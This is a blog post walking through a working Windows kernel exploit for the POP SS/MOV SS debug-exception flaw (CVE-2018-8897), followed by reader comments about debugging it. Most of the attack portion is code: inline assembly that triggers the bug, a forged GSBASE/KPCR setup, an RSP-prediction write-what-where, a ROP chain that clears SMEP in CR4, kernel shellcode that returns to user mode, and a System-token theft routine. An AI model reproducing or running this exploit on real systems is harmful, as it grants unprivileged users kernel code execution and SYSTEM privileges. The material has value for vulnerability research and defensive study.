Just a few days ago, a new vulnerability allowing an unprivileged user to run the #DB handler with a user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge, and that’s exactly what I’m going to attempt in this post.
Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMware), which discard the pending #DB after INT3. I debugged it by “simulating” this situation.
Final source code can be found at the bottom.
0x0: Setting Up the Basics
The fundamentals of this exploit are really simple, unlike its exploitation. When the stack segment is changed, whether via MOV or POP, interrupts are deferred until the next instruction completes. This is not a microcode bug but rather a feature added by Intel so that the stack segment and the stack pointer can be set at the same time.
However, many OS vendors missed this detail, which lets us raise, from user-mode, a #DB exception that is handled as if it came from CPL0.
We can create a deferred-to-CPL0 exception by setting the debug registers so that a #DB is raised during the execution of the stack-segment-changing instruction, and executing int 3 right after it. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised.
As mentioned by everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.
All of this can be done in a few lines, as shown below:
#include <Windows.h>
#include <iostream>

void main()
{
    static DWORD g_SavedSS = 0;

    _asm
    {
        mov ax, ss
        mov word ptr [ g_SavedSS ], ax
    }

    CONTEXT Ctx = { 0 };
    Ctx.Dr0 = ( DWORD ) &g_SavedSS;
    Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
    Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    SetThreadContext( HANDLE( -2 ), &Ctx );

    PVOID FakeGsBase = ...;

    _asm
    {
        mov eax, FakeGsBase ; Set eax to fake gs base

        push 0x23
        push X64_End
        push 0x33
        push X64_Start
        retf

    X64_Start:
        __emit 0xf3 ; wrgsbase eax
        __emit 0x0f
        __emit 0xae
        __emit 0xd8
        retf

    X64_End:
        ; Vulnerability
        mov ss, word ptr [ g_SavedSS ] ; Defer debug exception
        int 3                          ; Execute with interrupts disabled
        nop
    }
}
This example is 32-bit for the sake of showing ASM and C together; the final working code will be 64-bit.
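The Dr7 value in the snippet above packs three fields for breakpoint slot 0: the local enable bit, the access type, and the watched length. As a minimal sketch of how those bits fit together, here is a small helper; MakeDr7, BreakOn and BreakLen are hypothetical names that are not part of the original code, and the field encodings are the ones I understand the Intel SDM to document for DR7.

```cpp
#include <cassert>
#include <cstdint>

// RWn field of DR7: which kind of access triggers the breakpoint.
enum class BreakOn : uint32_t { Execute = 0, Write = 1, IoReadWrite = 2, ReadWrite = 3 };

// LENn field of DR7: size of the watched location.
enum class BreakLen : uint32_t { Byte1 = 0, Byte2 = 1, Byte8 = 2, Byte4 = 3 };

// Hypothetical helper (not in the original code): builds the DR7 bits
// that arm one local breakpoint slot (0..3).
constexpr uint32_t MakeDr7(unsigned slot, BreakOn rw, BreakLen len)
{
    return (1u << (slot * 2))                                // Ln: local enable bit
         | (static_cast<uint32_t>(rw)  << (16 + slot * 4))   // RWn: access type
         | (static_cast<uint32_t>(len) << (18 + slot * 4));  // LENn: watched size
}

// Same value as ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ) in the snippet above.
static_assert(MakeDr7(0, BreakOn::ReadWrite, BreakLen::Byte4) == 0xF0001u,
              "slot 0, read/write, 4 bytes");
```

With this, the assignment in the example would read Ctx.Dr7 = MakeDr7( 0, BreakOn::ReadWrite, BreakLen::Byte4 ), which makes it easier to see that the breakpoint fires on any 4-byte read or write of g_SavedSS.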
Now let’s start debugging: we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic; almost no function works, and we will end up in an infinite KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… loop. If we had a perfectly valid GSBASE, the outcome of what we have achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx.
We can utilize a small IDA script to step to relevant parts faster:
#include <idc.idc>

static main()
{
    Message( "--- Step Till Next GS ---\n" );

    while( 1 )
    {
        auto Disasm = GetDisasmEx( GetEventEa(), 1 );
        if ( strstr( Disasm, "gs:" ) >= Disasm )
            break;
        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );
    }
}
0x1: Fixing the KPCR Data
Here are the few cases where we have to modify the GSBASE contents to pass through successfully:
– KiDebugTrapOrFault
KiDebugTrapOrFault:
...
MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h
Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80.
– KiExceptionDispatch
KiExceptionDispatch:
...
MEMORY:FFFFF8018C20DB5F mov rax, gs:188h
MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8
Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.
– KiDispatchException
KiDispatchException:
...
MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188
MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h]
This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it.
KeCopyLastBranchInformation:
...
MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20
MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h]
0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while we are at it.
– RtlDispatchException
This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do?
There’s a weird check in the middle of the function:
char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3)
{
    ...
    if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) )
    {
        ...
    }
    else
    {
        *v5 = 5;
        result = 1;
        *v3 = 0xFFFFFFFFFFFFFFFFi64;
        *v4 = 0xFFFF800000000000i64;
    }
    return result;
}
Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved.
RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException.
– KeBugCheckEx
We are finally here. Here’s the last thing we need to fix:
MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20
MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h]
MEMORY:FFFFF8018C1FB95A call RtlCaptureContext
Pcr.CurrentPrcb->Context is where KeBugCheckEx saves the context of the caller, and for some weird reason it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr, so let’s just set it to Pcr + 0x3000 for the sake of having a valid pointer for now.
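To summarize the fixes from this section in one place, here is a minimal user-mode sketch that fills a fake PCR, a fake KTHREAD and a fake EPROCESS buffer with the values discussed above. The offsets are the ones quoted in the disassembly for this particular build; the Pcr.Self offset of 0x18, the buffer sizes, and the names FakeGs, Store, Load and BuildFakeGs are assumptions made for illustration and are not taken from the final source.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Offsets quoted in this section (build-specific). kPcrSelf is an assumption.
constexpr std::size_t kPcrSelf            = 0x18;
constexpr std::size_t kPcrCurrentPrcb     = 0x20;
constexpr std::size_t kPcrPrcb            = 0x180;   // Prcb is embedded at Pcr + 0x180
constexpr std::size_t kPrcbMxCsr          = 0x0;     // gs:180h
constexpr std::size_t kPrcbCurrentThread  = 0x8;     // gs:188h
constexpr std::size_t kPrcbRspBase        = 0x28;    // gs:1A8h
constexpr std::size_t kPrcbContext        = 0x62C0;  // [CurrentPrcb + 62C0h]
constexpr std::size_t kThreadInitialStack = 0x28;
constexpr std::size_t kThreadProcess      = 0xB8;

struct FakeGs { std::vector<uint8_t> pcr, thread, process; };

template <typename T>
void Store(std::vector<uint8_t>& buf, std::size_t off, T value)
{
    std::memcpy(buf.data() + off, &value, sizeof value);
}

template <typename T>
T Load(const std::vector<uint8_t>& buf, std::size_t off)
{
    T value;
    std::memcpy(&value, buf.data() + off, sizeof value);
    return value;
}

// Builds zeroed buffers and applies every fix described in this section.
FakeGs BuildFakeGs()
{
    FakeGs g{ std::vector<uint8_t>(0x10000), std::vector<uint8_t>(0x1000),
              std::vector<uint8_t>(0x1000) };
    const uint64_t pcr     = reinterpret_cast<uint64_t>(g.pcr.data());
    const uint64_t thread  = reinterpret_cast<uint64_t>(g.thread.data());
    const uint64_t process = reinterpret_cast<uint64_t>(g.process.data());

    Store<uint32_t>(g.pcr, kPcrPrcb + kPrcbMxCsr, 0x1F80);           // valid MXCSR for ldmxcsr
    Store<uint64_t>(g.pcr, kPcrPrcb + kPrcbCurrentThread, thread);   // Prcb.CurrentThread
    Store<uint64_t>(g.thread, kThreadProcess, process);              // ApcStateFill.Process
    Store<uint64_t>(g.pcr, kPcrCurrentPrcb, pcr + kPcrPrcb);         // Pcr.CurrentPrcb
    Store<uint64_t>(g.pcr, kPcrSelf, pcr);                           // Pcr.Self
    Store<uint64_t>(g.pcr, kPcrPrcb + kPrcbRspBase, 1);              // RspBase != InitialStack
    Store<uint64_t>(g.thread, kThreadInitialStack, 0);
    Store<uint64_t>(g.pcr, kPcrPrcb + kPrcbContext, pcr + 0x3000);   // any valid pointer for now
    return g;
}
```

The address of the pcr buffer is what would be loaded into GSBASE before triggering the vulnerability. Keeping the writes in one function also makes it obvious which fields have to change later, when Prcb.Context is pointed somewhere more interesting.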
0x2: and Write|What|Where
And there we go, sweet sweet blue screen of victory!
Now that everything works, how can we exploit it?
The code after KeBugCheckEx is too complex to step through one instruction at a time, and it is most likely not much fun to recover from, so let’s try NOT to bugcheck this time.
I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit:
#include <idc.idc>

static main()
{
    Message( "--- Logging Points of Interest ---\n" );

    while( 1 )
    {
        auto IP = GetEventEa();
        auto Disasm = GetDisasmEx( IP, 1 );

        if (
            ( strstr( Disasm, "gs:" ) >= Disasm ) ||
            ( strstr( Disasm, "jmp r" ) >= Disasm ) ||
            ( strstr( Disasm, "call r" ) >= Disasm ) ||
            ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ||
            ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) )
        {
            Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm );
        }

        StepInto();
        GetDebuggerEvent( WFNE_SUSP, -1 );

        if( IP == ... )
            break;
    }
}
To my disappointment, there are no convenient jumps or calls. The whole output is:
- KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h
- sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h
-- KiExceptionDispatch (+5f): mov rax, gs:188h
--- KiDispatchException (+48): mov rax, gs:188h
--- KiDispatchException (+5c): inc gs:5D30h
---- KeCopyLastBranchInformation (+38): mov rax, gs:20h
---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h
---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h
--- KeBugCheckEx (+1a): mov rcx, gs:20h
This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.
I was originally going to make it write over g_CiOptions and continuously call NtLoadDriver in another thread, but this idea did not work as well as I thought. (That being said, apparently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) The current thread is stuck in an infinite loop, and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses:
NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock
After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext.
How are we going to overwrite the return address without having access to RSP? With a little bit of creativity, we actually can get access to RSP. We can get the current RSP by making Prcb.Context point to user-mode memory and polling the Context.Rsp value from a secondary thread. Sadly, this is not useful by itself, as by then we have already passed RtlCaptureContext (our write-what-where exploit).
However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do.
To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made.
.text:000000014017595F mov rcx, gs:20h
.text:0000000140175968 add rcx, 100h
.text:000000014017596F call KiSaveProcessorControlState

.text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp
.text:0000000140175C80 ; KeSaveStateForHibernate+ECp
...
.text:0000000140175C80 mov rax, cr0
.text:0000000140175C83 mov [rcx], rax
.text:0000000140175C86 mov rax, cr2
.text:0000000140175C89 mov [rcx+8], rax
.text:0000000140175C8D mov rax, cr3
.text:0000000140175C90 mov [rcx+10h], rax
.text:0000000140175C94 mov rax, cr4
.text:0000000140175C97 mov [rcx+18h], rax
.text:0000000140175C9B mov rax, cr8
.text:0000000140175C9F mov [rcx+0A0h], rax
We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4.
To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant.
Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from it to find where the return pointer of RtlCaptureContext will be stored, and make RtlCaptureContext write Prcb.Context->Xmm13 through Prcb.Context->Xmm15 over it.
Thread logic will be like the following:
volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );

while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;
while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference
                                    // between sequential KiDebugTrapOrFault
StackDelta = Ctx->Rsp - StackInitial;
PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called
uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;
*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it
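To make the arithmetic of the polling thread easier to follow, here is the same calculation as a pure function with a worked example. PredictContextPointer and the Prediction struct are hypothetical names, the two RSP samples are made-up values, and the Xmm13 offset is passed in as a parameter because it depends on the CONTEXT layout (0x270 in the example is my assumption for x64).

```cpp
#include <cassert>
#include <cstdint>

struct Prediction
{
    uint64_t stackDelta;        // RSP difference between two consecutive captures
    uint64_t predictedNextRsp;  // expected RSP at the next RtlCaptureContext call
    uint64_t retPtrStorage;     // 16-byte aligned slot covering the return pointer
    uint64_t contextPointer;    // value to store in Prcb.Context
};

// Hypothetical helper mirroring the arithmetic of the polling thread.
inline Prediction PredictContextPointer(uint64_t firstRsp, uint64_t secondRsp,
                                        uint64_t offsetXmm13)
{
    Prediction p{};
    // The stack grows down, so this wraps around to a "negative" unsigned value.
    p.stackDelta       = secondRsp - firstRsp;
    p.predictedNextRsp = secondRsp + p.stackDelta;
    // The return pointer sits 8 bytes below RSP; align down for movaps.
    p.retPtrStorage    = (p.predictedNextRsp - 8) & ~uint64_t{ 0xF };
    // Place Context so that its Xmm13 field starts at the aligned slot.
    p.contextPointer   = p.retPtrStorage - offsetXmm13;
    return p;
}
```

For example, with leaked values 0xFFFFF00ED7A1C000 and 0xFFFFF00ED7A1BE00 the delta is -0x200, the predicted RSP is 0xFFFFF00ED7A1BC00, the aligned slot is 0xFFFFF00ED7A1BBF0, and with an Xmm13 offset of 0x270 the context pointer becomes 0xFFFFF00ED7A1B980.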
Now we simply need to set up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so the first two pointers should simply point at a [RETN] instruction.
To set CR4, we need to load a register with a value of our choice, so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode.
The final chain will look something like:
-- &retn; (fffff80372e9502d)
-- &retn; (fffff80372e9502d)
-- &pop rcx; retn; (fffff80372ed9122)
-- cr4_nosmep (00000000000506f8)
-- &mov cr4, rcx; retn; (fffff803730045c7)
-- &KernelShellcode (00007ff613fb1010)
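As a rough sketch of how such a chain could be assembled in user-mode before it is loaded into the XMM registers, the snippet below builds the six quadwords in the order listed above. Gadgets, ClearSmep and BuildChain are hypothetical names; the gadget addresses have to be resolved per kernel build, and SMEP being bit 20 of CR4 is the only hardware fact relied upon.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

constexpr uint64_t kCr4Smep = 1ull << 20;  // CR4.SMEP

// Returns the given CR4 value with SMEP disabled, all other bits untouched.
constexpr uint64_t ClearSmep(uint64_t cr4) { return cr4 & ~kCr4Smep; }

// Hypothetical container for gadget addresses found in the kernel image.
struct Gadgets
{
    uint64_t retn;           // retn
    uint64_t popRcxRetn;     // pop rcx; retn
    uint64_t movCr4RcxRetn;  // mov cr4, rcx; retn
};

// Lays out the chain in the order shown above: two retn sleds to absorb the
// alignment uncertainty, the CR4 load, the CR4 write, then the shellcode.
inline std::array<uint64_t, 6> BuildChain(const Gadgets& g, uint64_t currentCr4,
                                          uint64_t shellcode)
{
    return {{ g.retn, g.retn,
              g.popRcxRetn, ClearSmep(currentCr4),
              g.movCr4RcxRetn, shellcode }};
}
```

Assuming the original CR4 was 0x1506f8, ClearSmep yields the 0x506f8 seen in the listing. How the six values map onto the two halves of XMM13 through XMM15 depends on how the registers are loaded, so that step is deliberately left out here.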
In our shellcode, we will need to restore the CR4 value, swapgs, roll back the ISR stack, execute the code we want, and IRETQ back to user-mode, which can be done as shown below:
NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;

using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
NON_PAGED_DATA BYTE IRetToVulnStub[] =
{
    0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4
    0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack
    0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup
    0xFB,             // sti ; enable interrupts
    0x48, 0xCF        // iretq ; interrupt return
};

NON_PAGED_CODE void KernelShellcode()
{
    __writedr( 7, 0 );

    uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
    __writecr4( Cr4Old & ~( 1 << 20 ) );

    __swapgs();

    uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;

    // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
    while (
        ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
        ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
    {
        __rollback_isr( IsrStackIterator );

        // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
        if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
        {
            /*
            fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
            fffff00e`d7a1bc40 0000000000000010
            fffff00e`d7a1bc48 0000000000000002
            fffff00e`d7a1bc50 fffff00ed7a1bc68
            fffff00e`d7a1bc58 0000000000000000
            fffff00e`d7a1bc60 0000000000000014
            fffff00e`d7a1bc68 00007ff7e2261e95 --
            fffff00e`d7a1bc70 0000000000000033
            fffff00e`d7a1bc78 0000000000000202
            fffff00e`d7a1bc80 000000ad39b6f938
            */
            IsrStackIterator = IsrStackIterator + 0x30;
            break;
        }

        IsrStackIterator -= StackDelta;
    }

    PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
    Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );

    // ------ KERNEL CODE ------
    ....
    // ------ KERNEL CODE ------

    __swapgs();

    ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
    ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );
}
We can’t restore any registers, so we will make the thread responsible for triggering the vulnerability store its context in a global container and restore from it instead. Now that we have executed our code and returned to user-mode, our exploit is complete!
Let’s make a simple demo stealing the System token:
uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();

uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );

for ( int i = 0; i < 0x500; i += 0x8 )
{
    uint64_t Member = *( uint64_t * ) ( CurrentProcess + i );

    if ( ( Member & ~0xF ) == CurrentToken )
    {
        *( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
        break;
    }
}

k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );
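The loop above finds the token field without hardcoding its offset: it scans the process structure quadword by quadword and masks off the low four bits before comparing, presumably because the stored token pointer carries a small reference count in those bits. The scan can be tried out in user-mode against a plain buffer; FindTokenSlot and the fake data used with it are hypothetical and only illustrate the comparison.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns the byte offset of the first quadword whose value, with the low
// four bits masked off, equals token. Returns -1 if no slot matches.
inline std::ptrdiff_t FindTokenSlot(const uint8_t* process, std::size_t size,
                                    uint64_t token)
{
    for (std::size_t i = 0; i + sizeof(uint64_t) <= size; i += sizeof(uint64_t))
    {
        uint64_t member;
        std::memcpy(&member, process + i, sizeof member);  // alignment-safe read
        if ((member & ~uint64_t{ 0xF }) == token)
            return static_cast<std::ptrdiff_t>(i);
    }
    return -1;
}
```

A fake 0x500-byte structure that holds (token | 0x7) at some offset will return that offset, while a buffer without the token returns -1. Note that the kernel loop writes SystemToken back without the low bits, which is what the original code does as well.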
Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897
Credits:
- @0xNemi and @nickeverdox for finding the vulnerability
P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!
P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code.
The exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
How did you debug it by “simulating” this situation?
Please share the debugging method.
Simply put:
1) Load unsigned kernel driver
2) Allocate memory for new GS
3) Set debug registers using __writedr
4) swapgs
5) Set gs base
6) Access the break pointed memory and raise a #DB
7) Debug and Profit.
fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap rip for #bp
fffff00e`d7a1bc40 0000000000000010 cs for #bp
fffff00e`d7a1bc48 0000000000000002 rflags for #bp
fffff00e`d7a1bc50 fffff00ed7a1bc68 rsp for #bp
fffff00e`d7a1bc58 0000000000000000 ss for #bp
fffff00e`d7a1bc60 0000000000000014 ????????
fffff00e`d7a1bc68 00007ff7e2261e95 –rip for ring3
fffff00e`d7a1bc70 0000000000000033 cs for ring3
fffff00e`d7a1bc78 0000000000000202 rflags for ring3
fffff00e`d7a1bc80 000000ad39b6f938 ss for ring3
so what is this “fffff00e`d7a1bc60 0000000000000014” ??
Perhaps just stack alignment?
Thank you. It is stack alignment. I just find it in Intel Manual 6.14.2 64-Bit Mode Stack Frame.
Thanks for your answer.
Finally, I debug your code in the following steps:
1. Windbg Kernel debug: ba e1 KiDebugTrapService (I use INT 2D instead of INT 3)
Simulate the #DB event which should be created by movss
2. Then in IDA remote gdb(connected VMWare debug stub): set rip to skip notify windbg the #DB event
But in this way, the REAL_TIME watchdog thread was hard to get scheduled. When I force to set the context pointer to point to the kernel stack, I can run to the kernel shell code by ROP.
Hi, bro! Your work is so good. i’m a newcomer to kernel exploit. I have some questions after reading your article.
ONE. How to ,can u explain in more details?
TWO. As im new to this area, what is the basic knowledge I need to prepare, do you have some good books or articles to recommand for me?
I would appreciate for your precious reply.
Hello, bro!
I’m a newbee too. but I did some work about the CVE. I think maybe it is useful to you..
http://x86asm.net/articles/debugging-in-amd64-64-bit-mode-in-theory/ –> You could know some details about interrupts and exceptions, debug register. I think maybe you could read the article first. Because I think it is very useful.
https://www.bromium.com/dissecting-pop-ss-vulnerability/ –> You could get some details about the vulnerability…..I really think it is very useful…
https://github.com/nmulasmajic/CVE-2018-8897 –> POC from the finder.. I read it to know why the author know how to write EXP without any details..but I can’t.
http://everdox.net/popss.pdf –> white paper.
I’m sorry. My English is so terrible… ^_^…….. .
Hello, thanks for your work.!
When I read your code on GitHub, I could not understand HANDLE(-2). Must the value be -2?
Maybe I’m not good at google…I can’t find any answer about the value “-2″….
I’m sorry, my English is terrible…Looking forward to your reply!
HANDLE(-2) is equal to GetCurrentThread() 🙂
Thanks! very very thanks!!!
Hello, I’m sorry I always bother you…
When I run your code. I find that that the instruction
rdgsbase rax
can’t work.(I run the instruction in windows 7(64bit) and I sure the mode is X64..)
Then I run the instruction in windows 10(64bit), of course. The instruction work.
And I want to find another instruction to replace it. so I read Ntoskrnl.exe. find the code in function which is named “PsGetCurrentProcess”
.text:0000000140081D30 mov rax, gs:188h ; IoGetCurrentProcess
.text:0000000140081D39 mov rax, [rax+70h]
.text:0000000140081D3D retn
I think maybe I can do something like this…
lea rax, gs:188h(I know it won’t work… The instruction “mov rax, gs:00h” in visual won’t work too…)
Could you give me some tips.. Thank you very much.
And when I run your code. The code [i], [i+3],[i+7] , I think maybe it is lack of Versatility. I need to change the code like this and it will work.
if (UPsGetCurrentProcess[i] == 0x48 && UPsGetCurrentProcess[i + 1] == 0x8B && // mov rax,
UPsGetCurrentProcess[i + 4] == 0xC3) // retn
{
Offset_KThread__ApcStateFill__Process = (0x70); //I find the offset is 0x70, so I change it directly.
break;
}
Use number 4 instead of 7. I think have another method to run the code correctly in differcnt machines?
I’m sorry….I try not to ask such a stupid question again.Thank U.
I’m very sorry. I think maybe I get the answer from your github.
“Discovered the problem while doing something completely unrelated, rdgsbase / wrgsbase is not supported in Windows 7 so this exploit will not work unless you overwrite TEB instead which is not what I’m doing in the PoC”
I will try the mothods. Thank you!!!